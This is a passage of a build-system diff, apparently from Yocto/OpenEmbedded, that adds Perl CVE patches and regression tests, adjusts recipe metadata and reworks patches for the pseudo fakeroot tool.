+              * using strict */
+-            i = j = 0;
++            i = i_zero;
++            j = 0;
+         }
+     }
+ 
+@@ -23018,7 +23023,7 @@ Perl_parse_uniprop_string(pTHX_
+          * separates two digits */
+         if (cur == '_') {
+             if (    stricter
+-                && (     i == 0 || (int) i == equals_pos || i == name_len- 1
++                && (   i == i_zero || (int) i == equals_pos || i == name_len- 1
+                     || ! isDIGIT_A(name[i-1]) || ! isDIGIT_A(name[i+1])))
+             {
+                 lookup_name[j++] = '_';
+--- a/t/re/pat_advanced.t
++++ b/t/re/pat_advanced.t
+@@ -2524,6 +2524,14 @@ EOF
+                       "", {}, "*COMMIT caused positioning beyond EOS");
+     }
+ 
++    {   # perl-security#140, read/write past buffer end
++        fresh_perl_like('qr/\p{utf8::perl x}/',
++                        qr/Illegal user-defined property name "utf8::perl x" in regex/,
++                        {}, "perl-security#140");
++        fresh_perl_is('qr/\p{utf8::_perl_surrogate}/', "",
++                        {}, "perl-security#140");
++    }
++
+ 
+     # !!! NOTE that tests that aren't at all likely to crash perl should go
+     # a ways above, above these last ones.  There's a comment there that, like
diff --git a/meta/recipes-devtools/perl/libmodule-build-perl_0.4231.bb b/meta/recipes-devtools/perl/libmodule-build-perl_0.4231.bb
index a6fd7b1c07..c91b44cd6e 100644
--- a/meta/recipes-devtools/perl/libmodule-build-perl_0.4231.bb
+++ b/meta/recipes-devtools/perl/libmodule-build-perl_0.4231.bb
@@ -37,6 +37,7 @@ EXTRA_CPAN_BUILD_FLAGS = "--create_packlist=0"
 
 do_install_append () {
         rm -rf ${D}${docdir}/perl/html
+        sed -i "s:^#!.*:#!/usr/bin/env perl:" ${D}${bindir}/config_data
 }
 
 do_install_ptest() {
diff --git a/meta/recipes-devtools/perl/libxml-parser-perl_2.46.bb b/meta/recipes-devtools/perl/libxml-parser-perl_2.46.bb
index bc154bbdc5..ef2b292352 100644
--- a/meta/recipes-devtools/perl/libxml-parser-perl_2.46.bb
+++ b/meta/recipes-devtools/perl/libxml-parser-perl_2.46.bb
@@ -53,6 +53,7 @@ do_install_ptest() {
 	chown -R root:root ${D}${PTEST_PATH}/samples
 }
 
+RDEPENDS_${PN} += "perl-module-carp perl-module-file-spec"
 RDEPENDS_${PN}-ptest += "perl-module-filehandle perl-module-if perl-module-test perl-module-test-more"
 
 BBCLASSEXTEND="native nativesdk"
diff --git a/meta/recipes-devtools/perl/perl_5.30.1.bb b/meta/recipes-devtools/perl/perl_5.30.1.bb
index b53aff1216..bf81a023b8 100644
--- a/meta/recipes-devtools/perl/perl_5.30.1.bb
+++ b/meta/recipes-devtools/perl/perl_5.30.1.bb
@@ -1,5 +1,6 @@
 SUMMARY = "Perl scripting language"
 HOMEPAGE = "http://www.perl.org/"
+DESCRIPTION = "Perl is a highly capable, feature-rich programming language"
 SECTION = "devel"
 LICENSE = "Artistic-1.0 | GPL-1.0+"
 LIC_FILES_CHKSUM = "file://Copying;md5=5b122a36d0f6dc55279a0ebc69f3c60b \
@@ -28,6 +29,8 @@ SRC_URI = "https://www.cpan.org/src/5.0/perl-${PV}.tar.gz;name=perl \
            file://CVE-2020-10878_1.patch \
            file://CVE-2020-10878_2.patch \
            file://CVE-2020-12723.patch \
+           file://CVE-2023-31484.patch \
+           file://CVE-2023-47038.patch \
            "
 SRC_URI_append_class-native = " \
            file://perl-configpm-switch.patch \
@@ -43,6 +46,10 @@ SRC_URI[perl-cross.sha256sum] = "edce0b0c2f725e2db3f203d6d8e9f3f7161256f5d159055
 
 S = "${WORKDIR}/perl-${PV}"
 
+# This is windows only issue.
+# https://ubuntu.com/security/CVE-2023-47039
+CVE_CHECK_WHITELIST += "CVE-2023-47039"
+
 inherit upstream-version-is-even update-alternatives
 
 DEPENDS += "zlib virtual/crypt"
@@ -146,8 +153,9 @@ do_install() {
     install lib/ExtUtils/typemap ${D}${libdir}/perl5/${PV}/ExtUtils/
 
     # Fix up shared library
-    rm ${D}/${libdir}/perl5/${PV}/*/CORE/libperl.so
-    ln -sf ../../../../libperl.so.${PERL_LIB_VER} $(echo ${D}/${libdir}/perl5/${PV}/*/CORE)/libperl.so
+    dir=$(echo ${D}/${libdir}/perl5/${PV}/*/CORE)
+    rm $dir/libperl.so
+    ln -sf ../../../../libperl.so.${PERL_LIB_VER} $dir/libperl.so
 }
 
 do_install_append_class-target() {
diff --git a/meta/recipes-devtools/pkgconfig/pkgconfig_git.bb b/meta/recipes-devtools/pkgconfig/pkgconfig_git.bb
index 52ef2a9779..7bf68082b2 100644
--- a/meta/recipes-devtools/pkgconfig/pkgconfig_git.bb
+++ b/meta/recipes-devtools/pkgconfig/pkgconfig_git.bb
@@ -11,7 +11,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263"
 SRCREV = "edf8e6f0ea77ede073f07bff0d2ae1fc7a38103b"
 PV = "0.29.2+git${SRCPV}"
 
-SRC_URI = "git://anongit.freedesktop.org/pkg-config \
+SRC_URI = "git://gitlab.freedesktop.org/pkg-config/pkg-config.git;branch=master;protocol=https \
            file://pkg-config-esdk.in \
            file://pkg-config-native.in \
            file://fix-glib-configure-libtool-usage.patch \
diff --git a/meta/recipes-devtools/pseudo/files/0001-Add-statx.patch b/meta/recipes-devtools/pseudo/files/0001-Add-statx.patch
deleted file mode 100644
index f01e699de7..0000000000
--- a/meta/recipes-devtools/pseudo/files/0001-Add-statx.patch
+++ /dev/null
@@ -1,106 +0,0 @@
-From 4e41a05de1f34ba00a68ca4f20fb49c4d1cbd2d0 Mon Sep 17 00:00:00 2001
-From: Richard Purdie <richard.purdie@linuxfoundation.org>
-Date: Wed, 6 Nov 2019 12:17:46 +0000
-Subject: [PATCH] Add statx glibc/syscall support
-
-Modern distros (e.g. fedora30) are starting to use the new statx() syscall through
-the newly exposed glibc wrapper function in software like coreutils (e.g. the ls
-command). Add support to intercept this to pseudo.
-
-Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org>
-Upstream-Status: Submitted [Emailed to seebs]
----
- ports/linux/guts/statx.c | 48 ++++++++++++++++++++++++++++++++++++++++
- ports/linux/portdefs.h   |  1 +
- ports/linux/wrapfuncs.in |  1 +
- 3 files changed, 50 insertions(+)
- create mode 100644 ports/linux/guts/statx.c
-
-diff --git a/ports/linux/statx/guts/statx.c b/ports/linux/statx/guts/statx.c
-new file mode 100644
-index 0000000..a3259c4
---- /dev/null
-+++ b/ports/linux/statx/guts/statx.c
-@@ -0,0 +1,42 @@
-+/*
-+ * Copyright (c) 2019 Linux Foundation
-+ * Author: Richard Purdie
-+ *
-+ * SPDX-License-Identifier: LGPL-2.1-only
-+ *
-+ * int
-+ * statx(int dirfd, const char *pathname, int flags, unsigned int mask, struct statx *statxbuf) {
-+ *	int rc = -1;
-+ */
-+	pseudo_msg_t *msg;
-+	PSEUDO_STATBUF buf;
-+	int save_errno;
-+
-+	rc = real_statx(dirfd, pathname, flags, mask, statxbuf);
-+	save_errno = errno;
-+	if (rc == -1) {
-+		return rc;
-+	}
-+
-+	buf.st_uid = statxbuf->stx_uid;
-+	buf.st_gid = statxbuf->stx_gid;
-+	buf.st_dev = makedev(statxbuf->stx_dev_major, statxbuf->stx_dev_minor);
-+	buf.st_ino = statxbuf->stx_ino;
-+	buf.st_mode = statxbuf->stx_mode;
-+	buf.st_rdev = makedev(statxbuf->stx_rdev_major, statxbuf->stx_rdev_minor);
-+	buf.st_nlink = statxbuf->stx_nlink;
-+	msg = pseudo_client_op(OP_STAT, 0, -1, dirfd, pathname, &buf);
-+	if (msg && msg->result == RESULT_SUCCEED) {
-+		pseudo_debug(PDBGF_FILE, "statx(path %s), flags %o, stat rc %d, stat uid %o\n", pathname, flags, rc, statxbuf->stx_uid);
-+		statxbuf->stx_uid = msg->uid;
-+		statxbuf->stx_gid = msg->gid;
-+		statxbuf->stx_mode = msg->mode;
-+		statxbuf->stx_rdev_major = major(msg->rdev);
-+		statxbuf->stx_rdev_minor = minor(msg->rdev);
-+	} else {
-+		pseudo_debug(PDBGF_FILE, "statx(path %s) failed, flags %o, stat rc %d, stat uid %o\n", pathname, flags, rc, statxbuf->stx_uid);
-+	}
-+	errno = save_errno;
-+/*	return rc;
-+ * }
-+ */
-diff --git a/ports/linux/statx/portdefs.h b/ports/linux/statx/portdefs.h
-new file mode 100644
-index 0000000..bf934dc
---- /dev/null
-+++ b/ports/linux/statx/portdefs.h
-@@ -0,0 +1,6 @@
-+/*
-+ * SPDX-License-Identifier: LGPL-2.1-only
-+ *
-+ */
-+#include <sys/stat.h>
-+#include <sys/sysmacros.h>
-diff --git a/ports/linux/statx/wrapfuncs.in b/ports/linux/statx/wrapfuncs.in
-new file mode 100644
-index 0000000..c9cd4c3
---- /dev/null
-+++ b/ports/linux/statx/wrapfuncs.in
-@@ -0,0 +1 @@
-+int statx(int dirfd, const char *pathname, int flags, unsigned int mask, struct statx *statxbuf);
-diff --git a/ports/linux/subports b/ports/linux/subports
-index a29044a..49081bf 100755
---- a/ports/linux/subports
-+++ b/ports/linux/subports
-@@ -54,3 +54,13 @@ else
- fi
- rm -f dummy.c dummy.o
- 
-+cat > dummy.c <<EOF
-+#define _GNU_SOURCE
-+#include <sys/stat.h>
-+struct statx x;
-+EOF
-+if ${CC} -c -o dummy.o dummy.c >/dev/null 2>&1; then
-+	echo "linux/statx"
-+fi
-+rm -f dummy.c dummy.o
-+
--- 
-2.17.1
-
diff --git a/meta/recipes-devtools/pseudo/files/0001-maketables-wrappers-use-Python-3.patch b/meta/recipes-devtools/pseudo/files/0001-maketables-wrappers-use-Python-3.patch
deleted file mode 100644
index b2dbdad278..0000000000
--- a/meta/recipes-devtools/pseudo/files/0001-maketables-wrappers-use-Python-3.patch
+++ /dev/null
@@ -1,34 +0,0 @@
-From dbd34b1b2af8fbf44a0d5c37abe3448405819823 Mon Sep 17 00:00:00 2001
-From: Alexander Kanavin <alex.kanavin@gmail.com>
-Date: Wed, 28 Aug 2019 19:20:29 +0200
-Subject: [PATCH] maketables/wrappers: use Python 3
-
-Changelog indicates they should be compatible.
-
-Upstream-Status: Pending
-Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com>
----
- maketables   | 2 +-
- makewrappers | 2 +-
- 2 files changed, 2 insertions(+), 2 deletions(-)
-
-diff --git a/maketables b/maketables
-index a211772..52285e2 100755
---- a/maketables
-+++ b/maketables
-@@ -1,4 +1,4 @@
--#!/usr/bin/env python
-+#!/usr/bin/env python3
- #
- # Copyright (c) 2008-2010, 2013 Wind River Systems, Inc.
- #
-diff --git a/makewrappers b/makewrappers
-index e84607d..b34f7eb 100755
---- a/makewrappers
-+++ b/makewrappers
-@@ -1,4 +1,4 @@
--#!/usr/bin/env python
-+#!/usr/bin/env python3
- #
- # Copyright (c) 2008-2011,2013 Wind River Systems, Inc.
- #
diff --git a/meta/recipes-devtools/pseudo/files/0001-pseudo-On-a-DB-fixup-remove-files-that-do-not-exist-.patch b/meta/recipes-devtools/pseudo/files/0001-pseudo-On-a-DB-fixup-remove-files-that-do-not-exist-.patch
deleted file mode 100644
index 9c49e33b02..0000000000
--- a/meta/recipes-devtools/pseudo/files/0001-pseudo-On-a-DB-fixup-remove-files-that-do-not-exist-.patch
+++ /dev/null
@@ -1,49 +0,0 @@
-From b0902e36108b49e6bc88d6b251cc2f8cffcd5a13 Mon Sep 17 00:00:00 2001
-From: Ricardo Ribalda <ricardo@ribalda.com>
-Date: Sun, 5 Apr 2020 11:40:30 +0000
-Subject: [PATCH] pseudo: On a DB fixup remove files that do not exist anymore
-
-If the user decides to fix a database, remove the files that do not
-exist anymore.
-If only DB test is selected do not change the behaviour (return error).
-
-Signed-off-by: Ricardo Ribalda <ricardo@ribalda.com>
-Upstream-Status: Submitted [https://lists.openembedded.org/g/openembedded-core/message/137045]
----
- pseudo.c | 13 ++++++++++---
- 1 file changed, 10 insertions(+), 3 deletions(-)
-
-diff --git a/pseudo.c b/pseudo.c
-index 0f5850e..98e5b0c 100644
---- a/pseudo.c
-+++ b/pseudo.c
-@@ -1087,9 +1087,15 @@ pseudo_db_check(int fix) {
- 			int fixup_needed = 0;
- 			pseudo_debug(PDBGF_DB, "Checking <%s>\n", m->path);
- 			if (lstat(m->path, &buf)) {
--				errors = EXIT_FAILURE;
--				pseudo_diag("can't stat <%s>\n", m->path);
--				continue;
-+				if (!fix) {
-+					pseudo_diag("can't stat <%s>\n", m->path);
-+					errors = EXIT_FAILURE;
-+					continue;
-+				} else {
-+					pseudo_debug(PDBGF_DB, "can't stat <%s>\n", m->path);
-+					fixup_needed = 2;
-+					goto do_fixup;
-+				}
- 			}
- 			/* can't check for device type mismatches, uid/gid, or
- 			 * permissions, because those are the very things we
-@@ -1125,6 +1131,7 @@ pseudo_db_check(int fix) {
- 					S_ISDIR(m->mode));
- 				fixup_needed = 2;
- 			}
-+			do_fixup:
- 			if (fixup_needed) {
- 				/* in fixup mode, either delete (mismatches) or
- 				 * correct (dev/ino).
--- 
-2.21.1
-
diff --git a/meta/recipes-devtools/pseudo/files/0001-pseudo_ipc.h-Fix-enum-typedef.patch b/meta/recipes-devtools/pseudo/files/0001-pseudo_ipc.h-Fix-enum-typedef.patch
deleted file mode 100644
index 33d4ef3b2f..0000000000
--- a/meta/recipes-devtools/pseudo/files/0001-pseudo_ipc.h-Fix-enum-typedef.patch
+++ /dev/null
@@ -1,31 +0,0 @@
-From a491aececfedf7313d29b80d626e0964fb533548 Mon Sep 17 00:00:00 2001
-From: Jacob Kroon <jacob.kroon@gmail.com>
-Date: Sun, 3 May 2020 06:24:03 +0200
-Subject: [PATCH] pseudo_ipc.h: Fix enum typedef
-
-'pseudo_access_t' is a type, so use typedef.
-
-Fixes building pseudo with gcc 10 where -fno-common is the default.
-
-Signed-off-by: Jacob Kroon <jacob.kroon@gmail.com>
-Upstream-Status: Submitted [https://lists.openembedded.org/g/openembedded-core/message/137758]
----
- pseudo_ipc.h | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/pseudo_ipc.h b/pseudo_ipc.h
-index caeae5c..d945257 100644
---- a/pseudo_ipc.h
-+++ b/pseudo_ipc.h
-@@ -29,7 +29,7 @@ typedef struct {
- 	char path[];
- } pseudo_msg_t;
- 
--enum {
-+typedef enum {
- 	PSA_EXEC = 1,
- 	PSA_WRITE = (PSA_EXEC << 1),
- 	PSA_READ = (PSA_WRITE << 1),
--- 
-2.26.2
-
diff --git a/meta/recipes-devtools/pseudo/files/0001-realpath.c-Remove-trailing-slashes.patch b/meta/recipes-devtools/pseudo/files/0001-realpath.c-Remove-trailing-slashes.patch
deleted file mode 100644
index 17829ef3ac..0000000000
--- a/meta/recipes-devtools/pseudo/files/0001-realpath.c-Remove-trailing-slashes.patch
+++ /dev/null
@@ -1,57 +0,0 @@
-From 86c9a5610e3333ad6aaadb1ac1e8b5a2c948d119 Mon Sep 17 00:00:00 2001
-From: Robert Yang <liezhi.yang@windriver.com>
-Date: Mon, 25 Nov 2019 18:46:45 +0800
-Subject: [PATCH] realpath.c: Remove trailing slashes
-
-Linux system's realpath() remove trailing slashes, but pseudo's doesn't, need
-make them identical.
-
-E.g., the following code (rel.c) prints '/tmp' with system's realpath, but
-pseudo's realpath prints '/tmp/':
-
-    #include <stdio.h>
-    #include <limits.h>
-    #include <stdlib.h>
-
-    int main() {
-        char out[PATH_MAX];
-        printf("%s\n", realpath("/tmp/", out));
-        return 0;
-    }
-
-$ bitbake base-passwd -cdevshell # For pseudo env
-$ gcc rel.c
-$ ./a.out
-/tmp/ (but should be /tmp)
-
-This patch fixes the problem.
-
-Upstream-Status: Submitted [https://lists.yoctoproject.org/g/poky/message/11879]
-
-Signed-off-by: Robert Yang <liezhi.yang@windriver.com>
----
- ports/unix/guts/realpath.c |    9 ++++++++-
- 1 file changed, 8 insertions(+), 1 deletion(-)
-
-diff --git a/ports/unix/guts/realpath.c b/ports/unix/guts/realpath.c
---- a/ports/unix/guts/realpath.c
-+++ b/ports/unix/guts/realpath.c
-@@ -14,7 +14,14 @@
- 		errno = ENAMETOOLONG;
- 		return NULL;
- 	}
--	if ((len = strlen(rname)) >= pseudo_sys_path_max()) {
-+		len = strlen(rname);
-+		char *ep = rname + len - 1;
-+		while (ep > rname && *ep == '/') {
-+			--len;
-+			*(ep--) = '\0';
-+		}
-+
-+		if (len >= pseudo_sys_path_max()) {
- 		errno = ENAMETOOLONG;
- 		return NULL;
- 	}
--- 
-2.7.4
-
diff --git a/meta/recipes-devtools/pseudo/files/0006-xattr-adjust-for-attr-2.4.48-release.patch b/meta/recipes-devtools/pseudo/files/0006-xattr-adjust-for-attr-2.4.48-release.patch
deleted file mode 100644
index 161357d553..0000000000
--- a/meta/recipes-devtools/pseudo/files/0006-xattr-adjust-for-attr-2.4.48-release.patch
+++ /dev/null
@@ -1,48 +0,0 @@
-From 93d95ed2eaedcca110c214e1fe3f8896b1f6f853 Mon Sep 17 00:00:00 2001
-From: Alexander Kanavin <alex.kanavin@gmail.com>
-Date: Tue, 17 Dec 2019 20:24:27 +0100
-Subject: [PATCH] xattr: adjust for attr 2.4.48 release
-
-Latest versions of attr have removed the xattr.h header,
-with the rationale that libc is providing the same wrappers.
-
-attr/attributes.h is providing the ENOATTR definition.
-
-Upstream-Status: Pending
-Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com>
----
- ports/linux/subports         | 5 +++--
- ports/linux/xattr/portdefs.h | 3 ++-
- 2 files changed, 5 insertions(+), 3 deletions(-)
-
-diff --git a/ports/linux/subports b/ports/linux/subports
-index 2c43ac9..740ec83 100755
---- a/ports/linux/subports
-+++ b/ports/linux/subports
-@@ -29,11 +29,12 @@ fi
- if	$port_xattr; then
- 	cat > dummy.c <<EOF
- #include <sys/types.h>
--#include <attr/xattr.h>
-+#include <sys/xattr.h>
-+#include <attr/attributes.h>
- int i;
- EOF
- 	if ! ${CC} -c -o dummy.o dummy.c >/dev/null 2>&1; then
--		echo >&2 "Warning: Can't compile trivial program using <attr/xattr.h>".
-+		echo >&2 "Warning: Can't compile trivial program using <attr/attributes.h>".
- 		echo >&2 "         xattr support will require that header."
- 	fi
- 	echo "linux/xattr"
-diff --git a/ports/linux/xattr/portdefs.h b/ports/linux/xattr/portdefs.h
-index 56cd3ca..068d39a 100644
---- a/ports/linux/xattr/portdefs.h
-+++ b/ports/linux/xattr/portdefs.h
-@@ -2,5 +2,6 @@
-  * SPDX-License-Identifier: LGPL-2.1-only
-  *
-  */
--#include <attr/xattr.h>
-+#include <sys/xattr.h>
-+#include <attr/attributes.h>
- #include <stdint.h>
diff --git a/meta/recipes-devtools/pseudo/files/build-oldlibc b/meta/recipes-devtools/pseudo/files/build-oldlibc
new file mode 100755
index 0000000000..85c438de4e
--- /dev/null
+++ b/meta/recipes-devtools/pseudo/files/build-oldlibc
@@ -0,0 +1,20 @@
+#!/bin/sh
+#
+# Script to re-generate pseudo-prebuilt-2.33.tar.xz
+#
+# Copyright (C) 2021 Richard Purdie
+#
+# SPDX-License-Identifier: GPL-2.0-only
+#
+
+for i in x86_64 aarch64 i686; do
+    if [ ! -e $i-nativesdk-libc.tar.xz ]; then
+        wget http://downloads.yoctoproject.org/releases/uninative/3.2/$i-nativesdk-libc.tar.xz
+    fi
+    tar -xf $i-nativesdk-libc.tar.xz --wildcards \*/lib/libpthread\* \*/lib/libdl\*
+    cd $i-linux/lib
+    ln -s libdl.so.2 libdl.so
+    ln -s libpthread.so.0 libpthread.so
+    cd ../..
+done
+tar -cJf pseudo-prebuilt-2.33.tar.xz *-linux
\ No newline at end of file
diff --git a/meta/recipes-devtools/pseudo/files/moreretries.patch b/meta/recipes-devtools/pseudo/files/moreretries.patch
deleted file mode 100644
index adea2665b0..0000000000
--- a/meta/recipes-devtools/pseudo/files/moreretries.patch
+++ /dev/null
@@ -1,19 +0,0 @@
-Increase the number of retries in pseudo due to occasional slow
-server shutdowns.
-
-Upstream-Status: Pending
-RP 2016/2/28
-
-Index: git/pseudo_client.c
-===================================================================
---- git.orig/pseudo_client.c
-+++ git/pseudo_client.c
-@@ -1282,7 +1282,7 @@ pseudo_client_setup(void) {
- 	}
- }
- 
--#define PSEUDO_RETRIES 20
-+#define PSEUDO_RETRIES 250
- static pseudo_msg_t *
- pseudo_client_request(pseudo_msg_t *msg, size_t len, const char *path) {
- 	pseudo_msg_t *response = 0;
diff --git a/meta/recipes-devtools/pseudo/files/older-glibc-symbols.patch b/meta/recipes-devtools/pseudo/files/older-glibc-symbols.patch
new file mode 100644
index 0000000000..c453b5f735
--- /dev/null
+++ b/meta/recipes-devtools/pseudo/files/older-glibc-symbols.patch
@@ -0,0 +1,57 @@
+If we link against a newer glibc 2.34 and then try and our LD_PRELOAD is run against a
+binary on a host with an older libc, we see symbol errors since in glibc 2.34, pthread 
+and dl are merged into libc itself.
+
+We need to use the older form of linking so use glibc binaries from an older release
+to force this. We only use minimal symbols from these anyway.
+
+pthread_atfork is problematic, particularly on arm so use the internal glibc routine
+it maps too. This was always present in the main libc from 2.3.2 onwards.
+
+Yes this is horrible. Better solutions welcome.
+
+There is more info in the bug: [YOCTO #14521]
+
+Upstream-Status: Inappropriate [this patch is native and nativesdk]
+Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org>
+
+Tweak library search order, make prebuilt lib ahead of recipe lib
+Signed-off-by: Hongxu Jia <hongxu.jia@windriver.com>
+---
+ Makefile.in       | 2 +-
+ pseudo_wrappers.c | 5 ++++-
+ 2 files changed, 5 insertions(+), 2 deletions(-)
+
+diff --git a/Makefile.in b/Makefile.in
+--- a/Makefile.in
++++ b/Makefile.in
+@@ -120,7 +120,7 @@ $(PSEUDODB): pseudodb.o $(SHOBJS) $(DBOBJS) pseudo_ipc.o | $(BIN)
+ libpseudo: $(LIBPSEUDO)
+ 
+ $(LIBPSEUDO): $(WRAPOBJS) pseudo_client.o pseudo_ipc.o $(SHOBJS) | $(LIB)
+-	$(CC) $(CFLAGS) $(CFLAGS_PSEUDO) -shared -o $(LIBPSEUDO) \
++	$(CC) $(CFLAGS)  -Lprebuilt/$(shell uname -m)-linux/lib/ $(CFLAGS_PSEUDO) -shared -o $(LIBPSEUDO) \
+ 		pseudo_client.o pseudo_ipc.o \
+ 		$(WRAPOBJS) $(SHOBJS) $(LDFLAGS) $(CLIENT_LDFLAGS)
+ 
+diff --git a/pseudo_wrappers.c b/pseudo_wrappers.c
+--- a/pseudo_wrappers.c
++++ b/pseudo_wrappers.c
+@@ -100,10 +100,13 @@ static void libpseudo_atfork_child(void)
+ 	pseudo_mutex_holder = 0;
+ }
+ 
++extern void *__dso_handle;
++extern int __register_atfork (void (*) (void), void (*) (void), void (*) (void), void *);
++
+ static void
+ _libpseudo_init(void) {
+ 	if (!_libpseudo_initted)
+-		pthread_atfork(NULL, NULL, libpseudo_atfork_child);
++		__register_atfork (NULL, NULL, libpseudo_atfork_child, &__dso_handle == NULL ? NULL : __dso_handle);
+ 
+ 	pseudo_getlock();
+ 	pseudo_antimagic();
+-- 
+2.27.0
+
diff --git a/meta/recipes-devtools/pseudo/files/seccomp.patch b/meta/recipes-devtools/pseudo/files/seccomp.patch
deleted file mode 100644
index 283f997941..0000000000
--- a/meta/recipes-devtools/pseudo/files/seccomp.patch
+++ /dev/null
@@ -1,137 +0,0 @@
-Pseudo changes the syscall access patterns which makes it incompatible with
-seccomp. Therefore intercept the seccomp syscall and alter it, pretending that
-seccomp was setup when in fact we do nothing. If we error as unsupported, 
-utilities like file will exit with errors so we can't just disable it.
-
-Upstream-Status: Pending
-RP 2020/4/3
-Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org>
-
-It fails to compile pseudo-native on centos 7:
-
-| ports/linux/pseudo_wrappers.c: In function ‘prctl’:
-| ports/linux/pseudo_wrappers.c:129:14: error: ‘SECCOMP_SET_MODE_FILTER’ undeclared (first use in this function)
-|    if (cmd == SECCOMP_SET_MODE_FILTER) {
-|               ^
-
-Add macro guard for seccomp to avoid the failure.
-
-Signed-off-by: Kai Kang <kai.kang@windriver.com>
-
-Index: git/ports/linux/pseudo_wrappers.c
-===================================================================
---- git.orig/ports/linux/pseudo_wrappers.c
-+++ git/ports/linux/pseudo_wrappers.c
-@@ -57,6 +57,7 @@ int pseudo_capset(cap_user_header_t hdrp
- long
- syscall(long number, ...) {
- 	long rc = -1;
-+	va_list ap;
- 
- 	if (!pseudo_check_wrappers() || !real_syscall) {
- 		/* rc was initialized to the "failure" value */
-@@ -77,6 +78,20 @@ syscall(long number, ...) {
- 	(void) number;
- #endif
- 
-+#ifdef SYS_seccomp
-+	/* pseudo and seccomp are incompatible as pseudo uses different syscalls
-+	 * so pretend to enable seccomp but really do nothing */
-+	if (number == SYS_seccomp) {
-+		unsigned long cmd;
-+		va_start(ap, number);
-+		cmd = va_arg(ap, unsigned long);
-+		va_end(ap);
-+		if (cmd == SECCOMP_SET_MODE_FILTER) {
-+		    return 0;
-+		}
-+	}
-+#endif
-+
- 	/* gcc magic to attempt to just pass these args to syscall. we have to
- 	 * guess about the number of args; the docs discuss calling conventions
- 	 * up to 7, so let's try that?
-@@ -92,3 +108,44 @@ static long wrap_syscall(long nr, va_lis
- 	(void) ap;
- 	return -1;
- }
-+
-+int
-+prctl(int option, ...) {
-+	int rc = -1;
-+	va_list ap;
-+
-+	if (!pseudo_check_wrappers() || !real_prctl) {
-+		/* rc was initialized to the "failure" value */
-+		pseudo_enosys("prctl");
-+		return rc;
-+	}
-+
-+#ifdef SECCOMP_SET_MODE_FILTER
-+	/* pseudo and seccomp are incompatible as pseudo uses different syscalls
-+	 * so pretend to enable seccomp but really do nothing */
-+	if (option == PR_SET_SECCOMP) {
-+		unsigned long cmd;
-+		va_start(ap, option);
-+		cmd = va_arg(ap, unsigned long);
-+		va_end(ap);
-+		if (cmd == SECCOMP_SET_MODE_FILTER) {
-+		    return 0;
-+		}
-+	}
-+#endif
-+
-+	/* gcc magic to attempt to just pass these args to prctl. we have to
-+	 * guess about the number of args; the docs discuss calling conventions
-+	 * up to 5, so let's try that?
-+	 */
-+	void *res = __builtin_apply((void (*)()) real_prctl, __builtin_apply_args(), sizeof(long) * 5);
-+	__builtin_return(res);
-+}
-+
-+/* unused.
-+ */
-+static int wrap_prctl(int option, va_list ap) {
-+	(void) option;
-+	(void) ap;
-+	return -1;
-+}
-Index: git/ports/linux/guts/prctl.c
-===================================================================
---- /dev/null
-+++ git/ports/linux/guts/prctl.c
-@@ -0,0 +1,15 @@
-+/*
-+ * Copyright (c) 2020 Richard Purdie
-+ *
-+ * SPDX-License-Identifier: LGPL-2.1-only
-+ *
-+ * int prctl(int option, ...)
-+ *	int rc = -1;
-+ */
-+
-+	/* we should never get here, prctl is hand-wrapped */
-+	rc = -1;
-+
-+/*	return rc;
-+ * }
-+ */
-Index: git/ports/linux/portdefs.h
-===================================================================
---- git.orig/ports/linux/portdefs.h
-+++ git/ports/linux/portdefs.h
-@@ -32,3 +32,5 @@ GLIBC_COMPAT_SYMBOL(memcpy,2.0);
- 
- #include <linux/capability.h>
- #include <sys/syscall.h>
-+#include <sys/prctl.h>
-+#include <linux/seccomp.h>
-Index: git/ports/linux/wrapfuncs.in
-===================================================================
---- git.orig/ports/linux/wrapfuncs.in
-+++ git/ports/linux/wrapfuncs.in
-@@ -56,3 +56,4 @@ int getgrent_r(struct group *gbuf, char
- int capset(cap_user_header_t hdrp, const cap_user_data_t datap); /* real_func=pseudo_capset */
- long syscall(long nr, ...); /* hand_wrapped=1 */
- int renameat2(int olddirfd, const char *oldpath, int newdirfd, const char *newpath, unsigned int flags); /* flags=AT_SYMLINK_NOFOLLOW */
-+int prctl(int option, ...); /* hand_wrapped=1 */
diff --git a/meta/recipes-devtools/pseudo/files/toomanyfiles.patch b/meta/recipes-devtools/pseudo/files/toomanyfiles.patch
deleted file mode 100644
index bda7e4b202..0000000000
--- a/meta/recipes-devtools/pseudo/files/toomanyfiles.patch
+++ /dev/null
@@ -1,71 +0,0 @@
-From b0b25fbc041a148d1de09f5a6503cd95973ec77c Mon Sep 17 00:00:00 2001
-From: Richard Purdie <richard.purdie@linuxfoundation.org>
-Date: Tue, 25 Apr 2017 15:25:54 +0100
-Subject: [PATCH 3/3] pseudo: Handle too many files deadlock
-
-Currently if we max out the maximum number of files, pseudo can deadlock, unable to
-accept new connections yet unable to move forward and unblock the other processes
-waiting either.
-
-Rather than hang, when this happens, close out inactive connections, allowing us
-to accept the new ones. The disconnected clients will simply reconnect. There is
-a small risk of data loss here sadly but its better than hanging.
-
-RP
-2017/4/25
-
-Upstream-Status: Submitted [Peter is aware of the issue]
-
----
- pseudo_server.c | 10 ++++++++++
- 1 file changed, 10 insertions(+)
-
-diff --git a/pseudo_server.c b/pseudo_server.c
-index dac3258..15a3e8f 100644
---- a/pseudo_server.c
-+++ b/pseudo_server.c
-@@ -802,6 +802,7 @@ pseudo_server_loop(void) {
- 	struct sigaction eat_usr2 = {
- 		.sa_handler = set_do_list_clients
- 	};
-+	int hitmaxfiles;
- 
- 	clients = malloc(16 * sizeof(*clients));
- 
-@@ -820,6 +821,7 @@ pseudo_server_loop(void) {
- 	active_clients = 1;
- 	max_clients = 16;
- 	highest_client = 0;
-+	hitmaxfiles = 0;
- 
- 	pseudo_debug(PDBGF_SERVER, "server loop started.\n");
- 	if (listen_fd < 0) {
-@@ -878,10 +880,15 @@ pseudo_server_loop(void) {
- 					} else {
- 						serve_client(i);
- 					}
-+				} else if (hitmaxfiles) {
-+					/* Only close one per loop iteration in the interests of caution */
-+					close_client(i);
-+					hitmaxfiles = 0;
- 				}
- 				if (die_forcefully)
- 					break;
- 			}
-+			hitmaxfiles = 0;
- 			if (!die_forcefully && 
- 			    (FD_ISSET(clients[0].fd, &events) ||
